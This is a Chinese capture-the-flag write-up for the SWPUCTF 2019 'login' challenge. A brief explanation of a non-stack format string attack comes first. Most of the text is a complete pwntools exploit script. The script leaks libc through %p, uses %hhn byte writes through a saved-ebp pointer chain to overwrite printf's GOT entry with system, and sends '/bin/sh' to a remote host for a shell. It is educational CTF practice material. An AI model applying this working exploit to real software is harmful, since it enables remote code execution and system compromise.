思路

这题经典的非栈上格式化字符串，之前做了一道堆的，现在这道是往bss段写
但都是要利用ebp链表去改导向
看到可以写got表，没有金丝雀，也没有偏移，初步准备泄露libc，然后写printf

泄露比较简单
写地址的话要注意的点就是在写地址的时候注意不要一次性n输入，会造成大量数据输入失败。hhn逐字节输入。

EXP

from pwn import *

#p = process("./SWPUCTF_2019_login")
p = remote('node4.buuoj.cn',28591)
# context.log_level = 'debug'
elf = ELF("./SWPUCTF_2019_login")
libc = ELF('./libc-2.27-32.so')

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f",timeout = 1)[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)
def dbg():
    gdb.attach(p)
# leak libc
sla('Please input your name: ','mo')
sla('Please input your password: ','%15$p')
p.recvuntil('0x')
libc_start_main = int(p.recvuntil('\n'),16)-0xf1
lg('libc_start_main',libc_start_main)
libc_base = libc_start_main - libc.sym['__libc_start_main']
lg('libc_base',libc_base)
system_addr = libc.sym['system'] + libc_base
lg('system',system_addr)


printf_got = elf.got['printf']# 0x804b014
lg('printf_got',printf_got)
sla('Try again!','%6$p')
p.recvuntil('0x')
stack_6 = int(p.recvuntil('\n'),16)
lg('stack_6',stack_6)
sla('Try again!','%10$p')
p.recvuntil('0x')
stack_10 = int(p.recvuntil('\n'),16)
lg('stack_10',stack_10)

#add printf got
pl = '%'+ str(0x14) + 'c%10$hhn'
sla('Try again!',pl)

pl = '%' + str((stack_10 & 0xFF) + 1) + 'c%6$hhn'  
sla('Try again!',pl)
pl = '%' + str(0xB0) + 'c%10$hhn'  
sla('Try again!\n',pl)

pl = '%' + str((stack_10 & 0xFF) + 2) + 'c%6$hhn' 
sla('Try again!\n',pl)
pl = '%' + str(0x04) + 'c%10$hhn'  
sla('Try again!\n',pl)

pl = '%' + str((stack_10 & 0xFF) + 3) + 'c%6$hhn' 
sla('Try again!\n',pl)
pl = '%' + str(0x08) + 'c%10$hhn'  
sla('Try again!\n',pl)
#add printf got+1(edit printf_got bitbybit))
pl = '%' + str((stack_10 & 0xFF) + 4) + 'c%6$hhn'
sla('Try again!\n',pl)
pl = '%' + str(0x15) + 'c%10$hhn'
sla('Try again!\n',pl)

pl = '%' + str((stack_10 & 0xFF) + 5) + 'c%6$hhn'  
sla('Try again!',pl)
pl = '%' + str(0xb0) + 'c%10$hhn'  
sla('Try again!\n',pl)

pl = '%' + str((stack_10 & 0xFF) + 6) + 'c%6$hhn' 
sla('Try again!\n',pl)
pl = '%' + str(0x04) + 'c%10$hhn'  
sla('Try again!\n',pl)

pl = '%' + str((stack_10 & 0xFF) + 7) + 'c%6$hhn' 
sla('Try again!\n',pl)
pl = '%' + str(0x08) + 'c%10$hhn'  
sla('Try again!\n',pl)

# cover printf to system
# reset
pl = '%' + str((stack_10 & 0xFF)) + 'c%6$hhn'
sla('Try again!\n',pl)

pl  ='%' + str(system_addr & 0xFF) + 'c%14$hhn'
pl +='%' + str((((system_addr & 0xFFFF00)>>8))-0x10)+'c%15$hn'
sla('Try again!\n',pl)
sla('Try again!\n','/bin/sh\x00')

p.interactive()